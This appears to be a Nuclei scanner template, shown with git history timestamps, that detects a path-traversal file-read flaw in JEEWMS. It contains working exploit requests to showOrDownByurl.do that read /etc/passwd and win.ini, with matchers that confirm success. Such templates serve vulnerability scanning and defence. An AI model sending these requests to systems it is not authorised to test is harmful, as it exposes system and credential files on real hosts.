nuclei-templates/vulnerabilities/other/jeewms-lfi.yaml

43 lines
1.0 KiB
YAML
Raw Normal View History

2021-06-01 09:08:45 +00:00
id: jeewms-lfi
info:
name: JEEWMS - Local File Inclusion
2021-06-01 09:08:45 +00:00
author: pikpikcu
severity: high
description: JEEWMS is vulnerable to local file inclusion.
reference:
- https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
2021-06-01 09:08:45 +00:00
tags: jeewms,lfi
requests:
- raw:
- | #linux
GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1
2021-06-01 09:08:45 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- | #windows
GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-06-22 12:58:52 +00:00
- "\\[(font|extension|file)s\\]"
condition: or
part: body
2021-06-01 09:08:45 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/08/03